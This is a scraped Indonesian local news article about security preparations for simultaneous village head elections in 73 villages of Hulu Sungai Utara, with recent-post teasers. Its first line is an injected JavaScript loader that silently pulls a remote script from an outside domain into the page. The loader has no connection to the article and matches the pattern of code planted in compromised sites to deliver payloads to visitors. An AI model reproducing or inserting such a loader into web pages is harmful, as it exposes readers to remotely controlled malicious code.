(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

73 Desa di HSU Siap Gelar Pilkades Serentak, Ini Tanggal Pelaksanaannya


KANALKALIMANTAN.COM, AMUNTAI – Jelang pelaksanaan Pemilihan Kepala Desa (Pilkades) serentak tahun 2021 di Kabupaten Hulu Sungai Utara (HSU), Polres HSU melaksanakan apel gelar pasukan, Kamis (21/10/2021).

Apel dipimpin Bupati HSU H Abdul Wahid HK didampingi Kapolres HSU AKBP Afri Darmawan serta Dandim 1001/HSU-Balangan Letkol Inf Aldin Hadi.

Bupati HSU mengecek kesiapan pasukan baik komunikasi, mental dan fisik, kekompakan dan kerjasama, serta menjelaskan hak dan kewajiban sebelum nanti diterjunkan ke lapangan di 73 desa atau 139 TPS pada 27 Oktober 2021.

Bupati HSU menyambut baik atas kesiapan TNI-Polri menjaga keamanan jelang berlangsungnya Pilkades serentak yang akan dilaksanakan pada 27 Oktober 2021.

 

Baca juga : Jokowi ke Kalsel Disambut Unjuk Rasa Mahasiswa, Resmikan Pabrik Biodiesel Jhonlin Group dan Jembatan Alalak

“Semua persiapan telah dilakukan untuk pelaksanaan Pilkades serentak di Kabupaten HSU dapat berjalan lancar, damai, dan kondusif,” ujarnya.
Adapun petugas gabungan yang dilibatkan mulai dari Polri, TNI, Dishub, Satpol PP, Dinas Kesehatan, dan Satlinmas.

“Semua calon kepala desa telah diberikan tentang apa-apa saja yang boleh dilakukan dan tidak boleh dilakukan sampai pelaksanaan Pilkades nantinya,” ujarnya.

Kementerian Dalam Negeri mengizinkan pelaksanaan Pilkades di Kabupaten Hulu Sungai Utara

“Jadi semua instrumen untuk pelaksanaan Pilkades sudah disiapkan tinggal pelaksanaan pemungutan suara,” katanya.

 

Baca juga : Komnas Perempuan: Mendesak, Perbaikan Sistem Pembuktian Kasus Kekerasan Seksual

Masyarakat hendaknya dewasa dalam memilih, artinya memilih dengan hati nurani tanpa paksanaan, dan siapapun yang terpilih menerima dan jangan ada permusuhan karena berbeda pilihan.

Setelah pelaksanaan Pilkades tanggal 27 Oktober, Bupati Wahid berharap pada November kepala desa terpilih sudah bisa dilantik.

“Dan jangan lupa karena kita masih dalam suasana pandemi Covid-19, pelaksanaan Pilkades nanti baik masyarakat maupun aparat tetap menerapkan protokol kesehatan, menggunakan masker, mencuci tangan dengan sabun, menjaga jarak,” tandasnya.

Terpisah Dandim 1001/HSU-BLG mengatakan, Kodim 1001/HSU-BLG siap mendukung Polres HSU dalam menciptakan kondusifitas wilayah pada pelaksanaan pemilihan nanti. Serta mengedepankan protokol kesehatan mengingat pelaksanaan Pilkades masih dalam pandemi Covid-19.

“Apel gabungan ini, seluruh anggota diharapkan dapat memahami tugas dan tanggung jawab masing-masing,” tutup Dandim. (kanalkalimantan.com/dew)

Reporter : dew
Editor : bie


Desy Arfianty

Recent Posts

Dua APILL Disiapkan, Atasi Kemacetan di Panglima Batur Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru menggelar ekspose pembangunan Area Traffic Control System (ATCS)… Read More

2 jam ago

Dua Bapaslon Jalur Non Partai Serahkan Syarat Dukungan ke KPU Banjarmasin

KANALKALIMANTAN.COM, BANJARMASIN – Detik-detik terakhir penutupan penyerahan syarat dukungan bakal pasangan calon (Bapaslon) Wali Kota… Read More

3 jam ago

Bupati Lepas TP PKK Banjar Wakil Kalsel ke Parade Budaya Nusantara

KANALKALIMANTAN.COM, MARTAPURA - Bupati Banjar H Saidi Mansyur melepas peserta lomba Parade Budaya Nusantara, di… Read More

4 jam ago

Tak Ada Peminat Jalur Perseorangan di Pilwali Banjarbaru 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemilihan Wali Kota dan Wakil Wali Kota dalam kontestasi Pilkada 2024 di… Read More

4 jam ago

Kebakaran Dini Hari di Palangkaraya, Dana Hanya Bisa Selamatkan Anak Istri

KANALKALIMANTAN.COM, PALANGKARAYA - Puluhan rumah di permukiman padat penduduk Jalan Mendawai Induk, Kota Palangkaraya, Kalimantan… Read More

7 jam ago

Amuntai Expo dan Bazar UMKM 2024 Berakhir

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) melalui Asisten Perekonomian dan Pembangunan… Read More

7 jam ago

This website uses cookies.